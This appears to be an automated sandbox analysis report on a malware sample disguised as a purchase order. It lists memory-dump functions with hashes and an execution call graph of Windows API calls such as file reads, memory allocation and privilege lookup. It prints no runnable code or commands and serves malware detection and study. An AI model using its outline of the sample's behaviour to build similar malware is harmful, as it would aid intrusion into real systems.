                                                                            • Opcode Fuzzy Hash: abf19e7afc6ed1e0b40d1f55b31fd2083ab59e9194b163763aebe9ef61bb517c
                                                                            • Instruction Fuzzy Hash: 3C51FBB4E016598FCB14CFA9C6805AEBBF2FF89304F24C16AD418AB256D7349E41CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B62560 Relevance: .1, Instructions: 110COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07c4d5595a20e12531def1c0ba796b7a80b05665fee088ce08e180c66cd548f3
                                                                            • Instruction ID: c741fcc2320a50c8c118fec33119d305867cabc2b19505e4b12d6b0189d330ae
                                                                            • Opcode Fuzzy Hash: 07c4d5595a20e12531def1c0ba796b7a80b05665fee088ce08e180c66cd548f3
                                                                            • Instruction Fuzzy Hash: 55413A74E0520ADBDB18CFA9C5815AEFBF2FF88300F24C5AAC415B7254E734AA41CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B62570 Relevance: .1, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f9c1a4d51a962d949c65c065e21d1d1affb6247ad53ff8f6f993b952d335ff6
                                                                            • Instruction ID: 9a2901e9b99c96d1bce83ac734566b8c474338d3988cd45f8e5c8ea1cc95e0d3
                                                                            • Opcode Fuzzy Hash: 2f9c1a4d51a962d949c65c065e21d1d1affb6247ad53ff8f6f993b952d335ff6
                                                                            • Instruction Fuzzy Hash: DB41E974E0520ADBDB48CFA9C5415AEFBB2BF88200F24D569C515B7354E734AA418BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B632B8 Relevance: .1, Instructions: 106COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b40a3e121c37edb476a7ce33bd31202190752a0f072fcd63c6f7b74552003e2
                                                                            • Instruction ID: 07427039ca1bfcf3a0ed78f1d38755c2323a3b9ea1c22f2ac2c4bc903140046f
                                                                            • Opcode Fuzzy Hash: 1b40a3e121c37edb476a7ce33bd31202190752a0f072fcd63c6f7b74552003e2
                                                                            • Instruction Fuzzy Hash: 13415F71E116188BEB28CF6B9D4569EFBF3BFC8300F14C1BAD50CA6264DB7419868E51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B62100 Relevance: .1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30ee951593448b70d34a0b24e226c9197be80fee1a129b1acc339d256dc64dee
                                                                            • Instruction ID: 58fafad67ad0df469252233f54e6d5a619f21dbab4bc0744d69d13f128b95f5c
                                                                            • Opcode Fuzzy Hash: 30ee951593448b70d34a0b24e226c9197be80fee1a129b1acc339d256dc64dee
                                                                            • Instruction Fuzzy Hash: 7E41FDB4E0420A9FDB44CFAAC4805AEFBF2BF88310F24C0AAD915B7255D734A6428F54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B62110 Relevance: .1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 441e876d1c7d2f419f417f627f6fcfa34baaf1fd21c6a376958ee1fd4f80bb42
                                                                            • Instruction ID: 2d6b971b66af76f166014855823acc1a092922393a9a145f1c928cf01987f4d3
                                                                            • Opcode Fuzzy Hash: 441e876d1c7d2f419f417f627f6fcfa34baaf1fd21c6a376958ee1fd4f80bb42
                                                                            • Instruction Fuzzy Hash: B941DAB4E0420A9FDB44CFAAC5405AEFBF2BB88310F24D0A9D915B7244D7346A51CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B68F61 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 19a7858f969ae3f60324f2969de5f49014172d6ff5ce2847113396db816b7acf
                                                                            • Instruction ID: 0c64165dd1d63b926f55889475ae03ec8f1274688fda45f1a05bd84417441510
                                                                            • Opcode Fuzzy Hash: 19a7858f969ae3f60324f2969de5f49014172d6ff5ce2847113396db816b7acf
                                                                            • Instruction Fuzzy Hash: FB3186B5E006188BEB18CF6BD9407CEBBF7AFC8300F14C1AAD509AB265EB3459458F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B67040 Relevance: .1, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7a8a6bc0c3d1ced4b3df0b8eea3b0ccd6dcc8507076899861ba28439a15f7981
                                                                            • Instruction ID: 9ed37dd6b090974780892b4b0e43dc231d5a43e496dd3b1ca5624949e3467202
                                                                            • Opcode Fuzzy Hash: 7a8a6bc0c3d1ced4b3df0b8eea3b0ccd6dcc8507076899861ba28439a15f7981
                                                                            • Instruction Fuzzy Hash: ED111771E116199BEB08CFAAD840AEEFBF7EBC9310F14C06AD408A7214DB305A018B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B67030 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 24b528791ccf6adaa5b4c61fe5b792ff9eb6e30ccec9773a70d643c0fb4193eb
                                                                            • Instruction ID: a3cdc9d7477d32d93f67dae35e254d5801f5c2542aa52972d9f106f0af8fcf40
                                                                            • Opcode Fuzzy Hash: 24b528791ccf6adaa5b4c61fe5b792ff9eb6e30ccec9773a70d643c0fb4193eb
                                                                            • Instruction Fuzzy Hash: 31114C71E116198BEB48CFAAD8406AEFAF3AFC8300F14C17AD418A73A4DB705A018B51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B668F1 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e25ae37009600ed8536cef40ee2b2416de5afd021d22d396ac8cc2318352adc0
                                                                            • Instruction ID: c7215bf1a00d891b2483aea51503b46e5de180c7dd63b15839d75ee146836f35
                                                                            • Opcode Fuzzy Hash: e25ae37009600ed8536cef40ee2b2416de5afd021d22d396ac8cc2318352adc0
                                                                            • Instruction Fuzzy Hash: 7F113A70E116198BEB48CF6BD9416EEFBF7AFC8300F14C47A9849A7254DB705A428F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB881E Relevance: .0, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 315fca37f0f07c095d1a79b811ab60e0e394a58dfa5fc95a5a45fcecd643bcf7
                                                                            • Instruction ID: 1136fac1da784845b77a97a48669189ee4724652b6caaf69fef7a3f7c09e5725
                                                                            • Opcode Fuzzy Hash: 315fca37f0f07c095d1a79b811ab60e0e394a58dfa5fc95a5a45fcecd643bcf7
                                                                            • Instruction Fuzzy Hash: F9E04FB6959208CBCA208F99A4451F4BB7CE78F281F442052DA0ED3201D63095418F98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB8AA5 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b02fea86009d6e7b397700fc6c16d6ac0f36c83c7a8579bb8df401953728b7c2
                                                                            • Instruction ID: 7d4280d279cc29855eeab8e51e9d465ca7872f483c1d19d45b6dfe5eca169668
                                                                            • Opcode Fuzzy Hash: b02fea86009d6e7b397700fc6c16d6ac0f36c83c7a8579bb8df401953728b7c2
                                                                            • Instruction Fuzzy Hash: E1D05E5798F280DAC72206A56C540F0AB3DCADB061F9C21E3CA69D6693C014C1298399
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Execution Graph

                                                                            Execution Coverage:1.4%
                                                                            Dynamic/Decrypted Code Coverage:2.9%
                                                                            Signature Coverage:5.9%
                                                                            Total number of Nodes:561
                                                                            Total number of Limit Nodes:72
                                                                            execution_graph 98295 41f120 98298 41b970 98295->98298 98299 41b996 98298->98299 98306 409d40 98299->98306 98301 41b9a2 98302 41b9c3 98301->98302 98314 40c1c0 98301->98314 98304 41b9b5 98350 41a6b0 98304->98350 98353 409c90 98306->98353 98308 409d4d 98309 409d54 98308->98309 98365 409c30 98308->98365 98309->98301 98315 40c1e5 98314->98315 98785 40b1c0 98315->98785 98317 40c23c 98789 40ae40 98317->98789 98319 40c262 98349 40c4b3 98319->98349 98798 4143a0 98319->98798 98321 40c2a7 98321->98349 98801 408a60 98321->98801 98323 40c2eb 98323->98349 98808 41a500 98323->98808 98327 40c341 98328 40c348 98327->98328 98821 41a010 98327->98821 98329 41bdc0 2 API calls 98328->98329 98331 40c355 98329->98331 98331->98304 98333 40c392 98334 41bdc0 2 API calls 98333->98334 98335 40c399 98334->98335 98335->98304 98336 40c3a2 98337 40f4a0 3 API calls 98336->98337 98338 40c416 98337->98338 98338->98328 98339 40c421 98338->98339 98340 41bdc0 2 API calls 98339->98340 98341 40c445 98340->98341 98826 41a060 98341->98826 98344 41a010 2 API calls 98345 40c480 98344->98345 98345->98349 98831 419e20 98345->98831 98348 41a6b0 2 API calls 98348->98349 98349->98304 98351 41a6cf ExitProcess 98350->98351 98352 41af60 LdrLoadDll 98350->98352 98352->98351 98385 418bc0 98353->98385 98357 409cb6 98357->98308 98358 409cac 98358->98357 98392 41b2b0 98358->98392 98360 409cf3 98360->98357 98403 409ab0 98360->98403 98362 409d13 98409 409620 LdrLoadDll 98362->98409 98364 409d25 98364->98308 98366 409c40 98365->98366 98760 41b5a0 98366->98760 98369 41b5a0 LdrLoadDll 98370 409c5b 98369->98370 98371 41b5a0 LdrLoadDll 98370->98371 98372 409c71 98371->98372 98373 40f180 98372->98373 98374 40f199 98373->98374 98768 40b040 98374->98768 98376 40f1ac 98772 41a1e0 98376->98772 98380 40f1d2 98381 40f1fd 98380->98381 98778 41a260 98380->98778 98383 41a490 2 API calls 98381->98383 98384 409d65 98383->98384 98384->98301 98386 418bcf 98385->98386 98410 414e50 98386->98410 98388 409ca3 98389 418a70 98388->98389 98416 41a600 98389->98416 98393 41b2c9 98392->98393 98423 414a50 98393->98423 98395 41b2e1 98396 41b2ea 98395->98396 98462 41b0f0 98395->98462 98396->98360 98398 41b2fe 98398->98396 98480 419f00 98398->98480 98406 409aca 98403->98406 98738 407ea0 98403->98738 98405 409ad1 98405->98362 98406->98405 98751 408160 98406->98751 98409->98364 98411 414e6a 98410->98411 98412 414e5e 98410->98412 98411->98388 98412->98411 98415 4152d0 LdrLoadDll 98412->98415 98414 414fbc 98414->98388 98415->98414 98419 41af60 98416->98419 98418 418a85 98418->98358 98420 41af70 98419->98420 98422 41af92 98419->98422 98421 414e50 LdrLoadDll 98420->98421 98421->98422 98422->98418 98424 414d85 98423->98424 98425 414a64 98423->98425 98424->98395 98425->98424 98488 419c50 98425->98488 98428 414b90 98491 41a360 98428->98491 98429 414b73 98548 41a460 LdrLoadDll 98429->98548 98432 414bb7 98434 41bdc0 2 API calls 98432->98434 98433 414b7d 98433->98395 98436 414bc3 98434->98436 98435 414d49 98438 41a490 2 API calls 98435->98438 98436->98433 98436->98435 98437 414d5f 98436->98437 98442 414c52 98436->98442 98557 414790 LdrLoadDll NtReadFile NtClose 98437->98557 98440 414d50 98438->98440 98440->98395 98441 414d72 98441->98395 98443 414cb9 98442->98443 98445 414c61 98442->98445 98443->98435 98444 414ccc 98443->98444 98550 41a2e0 98444->98550 98447 414c66 98445->98447 98448 414c7a 98445->98448 98549 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98447->98549 98451 414c97 98448->98451 98452 414c7f 98448->98452 98451->98440 98506 414410 98451->98506 98494 4146f0 98452->98494 98454 414c70 98454->98395 98457 414d2c 98554 41a490 98457->98554 98458 414c8d 98458->98395 98459 414caf 98459->98395 98461 414d38 98461->98395 98463 41b101 98462->98463 98464 41b113 98463->98464 98575 41bd40 98463->98575 98464->98398 98466 41b134 98578 414070 98466->98578 98468 41b180 98468->98398 98469 41b157 98469->98468 98470 414070 3 API calls 98469->98470 98472 41b179 98470->98472 98472->98468 98610 415390 98472->98610 98473 41b20a 98474 41b21a 98473->98474 98704 41af00 LdrLoadDll 98473->98704 98620 41ad70 98474->98620 98477 41b248 98699 419ec0 98477->98699 98481 419f1c 98480->98481 98482 41af60 LdrLoadDll 98480->98482 98732 1772c0a 98481->98732 98482->98481 98483 419f37 98485 41bdc0 98483->98485 98735 41a670 98485->98735 98487 41b359 98487->98360 98489 41af60 LdrLoadDll 98488->98489 98490 414b44 98488->98490 98489->98490 98490->98428 98490->98429 98490->98433 98492 41a37c NtCreateFile 98491->98492 98493 41af60 LdrLoadDll 98491->98493 98492->98432 98493->98492 98495 41470c 98494->98495 98496 41a2e0 LdrLoadDll 98495->98496 98497 41472d 98496->98497 98498 414734 98497->98498 98499 414748 98497->98499 98501 41a490 2 API calls 98498->98501 98500 41a490 2 API calls 98499->98500 98502 414751 98500->98502 98503 41473d 98501->98503 98558 41bfd0 LdrLoadDll RtlAllocateHeap 98502->98558 98503->98458 98505 41475c 98505->98458 98507 41445b 98506->98507 98508 41448e 98506->98508 98509 41a2e0 LdrLoadDll 98507->98509 98510 4145d9 98508->98510 98513 4144aa 98508->98513 98512 414476 98509->98512 98511 41a2e0 LdrLoadDll 98510->98511 98518 4145f4 98511->98518 98514 41a490 2 API calls 98512->98514 98515 41a2e0 LdrLoadDll 98513->98515 98516 41447f 98514->98516 98517 4144c5 98515->98517 98516->98459 98520 4144e1 98517->98520 98521 4144cc 98517->98521 98571 41a320 LdrLoadDll 98518->98571 98524 4144e6 98520->98524 98528 4144fc 98520->98528 98523 41a490 2 API calls 98521->98523 98522 41462e 98525 41a490 2 API calls 98522->98525 98526 4144d5 98523->98526 98527 41a490 2 API calls 98524->98527 98529 414639 98525->98529 98526->98459 98530 4144ef 98527->98530 98533 414501 98528->98533 98559 41bf90 98528->98559 98529->98459 98530->98459 98542 414513 98533->98542 98562 41a410 98533->98562 98534 414567 98535 41457e 98534->98535 98570 41a2a0 LdrLoadDll 98534->98570 98537 414585 98535->98537 98538 41459a 98535->98538 98540 41a490 2 API calls 98537->98540 98539 41a490 2 API calls 98538->98539 98541 4145a3 98539->98541 98540->98542 98543 4145cf 98541->98543 98565 41bb90 98541->98565 98542->98459 98543->98459 98545 4145ba 98546 41bdc0 2 API calls 98545->98546 98547 4145c3 98546->98547 98547->98459 98548->98433 98549->98454 98551 41af60 LdrLoadDll 98550->98551 98552 414d14 98551->98552 98553 41a320 LdrLoadDll 98552->98553 98553->98457 98555 41af60 LdrLoadDll 98554->98555 98556 41a4ac NtClose 98555->98556 98556->98461 98557->98441 98558->98505 98561 41bfa8 98559->98561 98572 41a630 98559->98572 98561->98533 98563 41a42c NtReadFile 98562->98563 98564 41af60 LdrLoadDll 98562->98564 98563->98534 98564->98563 98566 41bbb4 98565->98566 98567 41bb9d 98565->98567 98566->98545 98567->98566 98568 41bf90 2 API calls 98567->98568 98569 41bbcb 98568->98569 98569->98545 98570->98535 98571->98522 98573 41af60 LdrLoadDll 98572->98573 98574 41a64c RtlAllocateHeap 98573->98574 98574->98561 98705 41a540 98575->98705 98577 41bd6d 98577->98466 98579 414081 98578->98579 98580 414089 98578->98580 98579->98469 98609 41435c 98580->98609 98708 41cf30 98580->98708 98582 4140dd 98583 41cf30 2 API calls 98582->98583 98586 4140e8 98583->98586 98584 414136 98587 41cf30 2 API calls 98584->98587 98586->98584 98588 41d060 3 API calls 98586->98588 98719 41cfd0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 98586->98719 98593 41414a 98587->98593 98588->98586 98589 4141a7 98590 41cf30 2 API calls 98589->98590 98592 4141bd 98590->98592 98594 4141fa 98592->98594 98597 41d060 3 API calls 98592->98597 98593->98589 98713 41d060 98593->98713 98595 41cf30 2 API calls 98594->98595 98596 414205 98595->98596 98598 41d060 3 API calls 98596->98598 98604 41423f 98596->98604 98597->98592 98598->98596 98600 414334 98721 41cf90 LdrLoadDll RtlFreeHeap 98600->98721 98602 41433e 98722 41cf90 LdrLoadDll RtlFreeHeap 98602->98722 98720 41cf90 LdrLoadDll RtlFreeHeap 98604->98720 98605 414348 98723 41cf90 LdrLoadDll RtlFreeHeap 98605->98723 98607 414352 98724 41cf90 LdrLoadDll RtlFreeHeap 98607->98724 98609->98469 98611 4153a1 98610->98611 98612 414a50 8 API calls 98611->98612 98614 4153b7 98612->98614 98613 41540a 98613->98473 98614->98613 98615 4153f2 98614->98615 98616 415405 98614->98616 98618 41bdc0 2 API calls 98615->98618 98617 41bdc0 2 API calls 98616->98617 98617->98613 98619 4153f7 98618->98619 98619->98473 98725 41ac30 98620->98725 98622 41ad84 98623 41ac30 LdrLoadDll 98622->98623 98624 41ad8d 98623->98624 98625 41ac30 LdrLoadDll 98624->98625 98626 41ad96 98625->98626 98627 41ac30 LdrLoadDll 98626->98627 98628 41ad9f 98627->98628 98629 41ac30 LdrLoadDll 98628->98629 98630 41ada8 98629->98630 98631 41ac30 LdrLoadDll 98630->98631 98632 41adb1 98631->98632 98633 41ac30 LdrLoadDll 98632->98633 98634 41adbd 98633->98634 98635 41ac30 LdrLoadDll 98634->98635 98636 41adc6 98635->98636 98637 41ac30 LdrLoadDll 98636->98637 98638 41adcf 98637->98638 98639 41ac30 LdrLoadDll 98638->98639 98640 41add8 98639->98640 98641 41ac30 LdrLoadDll 98640->98641 98642 41ade1 98641->98642 98643 41ac30 LdrLoadDll 98642->98643 98644 41adea 98643->98644 98645 41ac30 LdrLoadDll 98644->98645 98646 41adf6 98645->98646 98647 41ac30 LdrLoadDll 98646->98647 98648 41adff 98647->98648 98649 41ac30 LdrLoadDll 98648->98649 98650 41ae08 98649->98650 98651 41ac30 LdrLoadDll 98650->98651 98652 41ae11 98651->98652 98653 41ac30 LdrLoadDll 98652->98653 98654 41ae1a 98653->98654 98655 41ac30 LdrLoadDll 98654->98655 98656 41ae23 98655->98656 98657 41ac30 LdrLoadDll 98656->98657 98658 41ae2f 98657->98658 98659 41ac30 LdrLoadDll 98658->98659 98660 41ae38 98659->98660 98661 41ac30 LdrLoadDll 98660->98661 98662 41ae41 98661->98662 98663 41ac30 LdrLoadDll 98662->98663 98664 41ae4a 98663->98664 98665 41ac30 LdrLoadDll 98664->98665 98666 41ae53 98665->98666 98667 41ac30 LdrLoadDll 98666->98667 98668 41ae5c 98667->98668 98669 41ac30 LdrLoadDll 98668->98669 98670 41ae68 98669->98670 98671 41ac30 LdrLoadDll 98670->98671 98672 41ae71 98671->98672 98673 41ac30 LdrLoadDll 98672->98673 98674 41ae7a 98673->98674 98675 41ac30 LdrLoadDll 98674->98675 98676 41ae83 98675->98676 98677 41ac30 LdrLoadDll 98676->98677 98678 41ae8c 98677->98678 98679 41ac30 LdrLoadDll 98678->98679 98680 41ae95 98679->98680 98681 41ac30 LdrLoadDll 98680->98681 98682 41aea1 98681->98682 98683 41ac30 LdrLoadDll 98682->98683 98684 41aeaa 98683->98684 98685 41ac30 LdrLoadDll 98684->98685 98686 41aeb3 98685->98686 98687 41ac30 LdrLoadDll 98686->98687 98688 41aebc 98687->98688 98689 41ac30 LdrLoadDll 98688->98689 98690 41aec5 98689->98690 98691 41ac30 LdrLoadDll 98690->98691 98692 41aece 98691->98692 98693 41ac30 LdrLoadDll 98692->98693 98694 41aeda 98693->98694 98695 41ac30 LdrLoadDll 98694->98695 98696 41aee3 98695->98696 98697 41ac30 LdrLoadDll 98696->98697 98698 41aeec 98697->98698 98698->98477 98700 41af60 LdrLoadDll 98699->98700 98701 419edc 98700->98701 98731 1772df0 LdrInitializeThunk 98701->98731 98702 419ef3 98702->98398 98704->98474 98706 41af60 LdrLoadDll 98705->98706 98707 41a55c NtAllocateVirtualMemory 98706->98707 98707->98577 98709 41cf40 98708->98709 98710 41cf46 98708->98710 98709->98582 98711 41bf90 2 API calls 98710->98711 98712 41cf6c 98711->98712 98712->98582 98714 41cfd0 98713->98714 98715 41bf90 2 API calls 98714->98715 98716 41d02d 98714->98716 98717 41d00a 98715->98717 98716->98593 98718 41bdc0 2 API calls 98717->98718 98718->98716 98719->98586 98720->98600 98721->98602 98722->98605 98723->98607 98724->98609 98726 41ac4b 98725->98726 98727 414e50 LdrLoadDll 98726->98727 98728 41ac6b 98727->98728 98729 414e50 LdrLoadDll 98728->98729 98730 41ad17 98728->98730 98729->98730 98730->98622 98730->98730 98731->98702 98733 1772c11 98732->98733 98734 1772c1f LdrInitializeThunk 98732->98734 98733->98483 98734->98483 98736 41a68c RtlFreeHeap 98735->98736 98737 41af60 LdrLoadDll 98735->98737 98736->98487 98737->98736 98739 407eb0 98738->98739 98740 407eab 98738->98740 98741 41bd40 2 API calls 98739->98741 98740->98406 98742 407ed5 98741->98742 98743 407f38 98742->98743 98744 419ec0 2 API calls 98742->98744 98745 407f3e 98742->98745 98750 41bd40 2 API calls 98742->98750 98754 41a5c0 98742->98754 98743->98406 98744->98742 98746 407f64 98745->98746 98748 41a5c0 2 API calls 98745->98748 98746->98406 98749 407f55 98748->98749 98749->98406 98750->98742 98752 40817e 98751->98752 98753 41a5c0 2 API calls 98751->98753 98752->98362 98753->98752 98755 41af60 LdrLoadDll 98754->98755 98756 41a5dc 98755->98756 98759 1772c70 LdrInitializeThunk 98756->98759 98757 41a5f3 98757->98742 98759->98757 98761 41b5c3 98760->98761 98764 40acf0 98761->98764 98765 40ad14 98764->98765 98766 40ad50 LdrLoadDll 98765->98766 98767 409c4a 98765->98767 98766->98767 98767->98369 98769 40b063 98768->98769 98771 40b0e0 98769->98771 98783 419c90 LdrLoadDll 98769->98783 98771->98376 98773 41af60 LdrLoadDll 98772->98773 98774 40f1bb 98773->98774 98774->98384 98775 41a7d0 98774->98775 98776 41a7ef LookupPrivilegeValueW 98775->98776 98777 41af60 LdrLoadDll 98775->98777 98776->98380 98777->98776 98779 41a27c 98778->98779 98780 41af60 LdrLoadDll 98778->98780 98784 1772ea0 LdrInitializeThunk 98779->98784 98780->98779 98781 41a29b 98781->98381 98783->98771 98784->98781 98786 40b1f0 98785->98786 98787 40b040 LdrLoadDll 98786->98787 98788 40b204 98787->98788 98788->98317 98790 40ae51 98789->98790 98791 40ae4d 98789->98791 98792 40ae6a 98790->98792 98793 40ae9c 98790->98793 98791->98319 98836 419cd0 LdrLoadDll 98792->98836 98837 419cd0 LdrLoadDll 98793->98837 98795 40aead 98795->98319 98797 40ae8c 98797->98319 98799 40f4a0 3 API calls 98798->98799 98800 4143c6 98799->98800 98800->98321 98838 4087a0 98801->98838 98804 408a9d 98804->98323 98805 4087a0 20 API calls 98806 408a8a 98805->98806 98806->98804 98856 40f710 10 API calls 98806->98856 98809 41a501 98808->98809 98810 41af60 LdrLoadDll 98809->98810 98811 41a51c 98810->98811 98979 1772e80 LdrInitializeThunk 98811->98979 98812 40c322 98814 40f4a0 98812->98814 98815 40f4bd 98814->98815 98980 419fc0 98815->98980 98818 40f505 98818->98327 98819 41a010 2 API calls 98820 40f52e 98819->98820 98820->98327 98822 41a02c 98821->98822 98823 41af60 LdrLoadDll 98821->98823 98986 1772d10 LdrInitializeThunk 98822->98986 98823->98822 98824 40c385 98824->98333 98824->98336 98827 41af60 LdrLoadDll 98826->98827 98828 41a07c 98827->98828 98987 1772d30 LdrInitializeThunk 98828->98987 98829 40c459 98829->98344 98832 41af60 LdrLoadDll 98831->98832 98833 419e3c 98832->98833 98988 1772fb0 LdrInitializeThunk 98833->98988 98834 40c4ac 98834->98348 98836->98797 98837->98795 98839 407ea0 4 API calls 98838->98839 98854 4087ba 98838->98854 98839->98854 98840 408a49 98840->98804 98840->98805 98841 408a3f 98842 408160 2 API calls 98841->98842 98842->98840 98845 419f00 2 API calls 98845->98854 98847 41a490 LdrLoadDll NtClose 98847->98854 98850 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98850->98854 98853 419e20 2 API calls 98853->98854 98854->98840 98854->98841 98854->98845 98854->98847 98854->98850 98854->98853 98857 419d10 98854->98857 98860 4085d0 98854->98860 98872 40f5f0 LdrLoadDll NtClose 98854->98872 98873 419d90 LdrLoadDll 98854->98873 98874 419dc0 LdrLoadDll 98854->98874 98875 419e50 LdrLoadDll 98854->98875 98876 4083a0 98854->98876 98892 405f60 LdrLoadDll 98854->98892 98856->98804 98858 41af60 LdrLoadDll 98857->98858 98859 419d2c 98858->98859 98859->98854 98861 4085e6 98860->98861 98893 419880 98861->98893 98863 4085ff 98868 408771 98863->98868 98914 4081a0 98863->98914 98865 4086e5 98866 4083a0 11 API calls 98865->98866 98865->98868 98867 408713 98866->98867 98867->98868 98869 419f00 2 API calls 98867->98869 98868->98854 98870 408748 98869->98870 98870->98868 98871 41a500 2 API calls 98870->98871 98871->98868 98872->98854 98873->98854 98874->98854 98875->98854 98877 4083c9 98876->98877 98958 408310 98877->98958 98880 4083dc 98881 41a500 2 API calls 98880->98881 98882 408467 98880->98882 98885 408462 98880->98885 98966 40f670 98880->98966 98881->98880 98882->98854 98883 41a490 2 API calls 98884 40849a 98883->98884 98884->98882 98886 419d10 LdrLoadDll 98884->98886 98885->98883 98887 4084ff 98886->98887 98887->98882 98970 419d50 98887->98970 98889 408563 98889->98882 98890 414a50 8 API calls 98889->98890 98891 4085b8 98890->98891 98891->98854 98892->98854 98894 41bf90 2 API calls 98893->98894 98895 419897 98894->98895 98921 409310 98895->98921 98897 4198b2 98898 4198f0 98897->98898 98899 4198d9 98897->98899 98902 41bd40 2 API calls 98898->98902 98900 41bdc0 2 API calls 98899->98900 98901 4198e6 98900->98901 98901->98863 98903 41992a 98902->98903 98904 41bd40 2 API calls 98903->98904 98905 419943 98904->98905 98911 419be4 98905->98911 98927 41bd80 98905->98927 98908 419bd0 98909 41bdc0 2 API calls 98908->98909 